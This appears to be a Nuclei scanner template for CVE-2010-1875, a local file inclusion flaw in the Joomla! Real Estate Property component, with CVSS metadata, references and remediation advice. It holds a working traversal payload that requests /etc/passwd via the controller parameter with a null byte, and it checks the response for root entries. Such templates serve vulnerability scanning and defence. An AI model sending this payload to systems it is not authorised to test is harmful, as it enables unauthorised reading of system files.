45 lines
1.7 KiB
YAML
45 lines
1.7 KiB
YAML
id: CVE-2010-1875
|
|
|
|
info:
|
|
name: Joomla! Component Property - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
|
|
remediation: |
|
|
To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/11851
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2010-1875
|
|
- http://www.exploit-db.com/exploits/11851
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57110
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2010-1875
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01222
|
|
epss-percentile: 0.8377
|
|
cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: com-property
|
|
product: com_properties
|
|
tags: cve,cve2010,joomla,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100ad0efcfb6c7ce4c4b1184e6ace756715d2c7bb83b4a60b56e02248b5ff49486d022100d3e8f265a77042380e1ff4b52b2c7843912132fb8f0d48923598a8e787264172:922c64590222798bb761d5b6d8e72950
|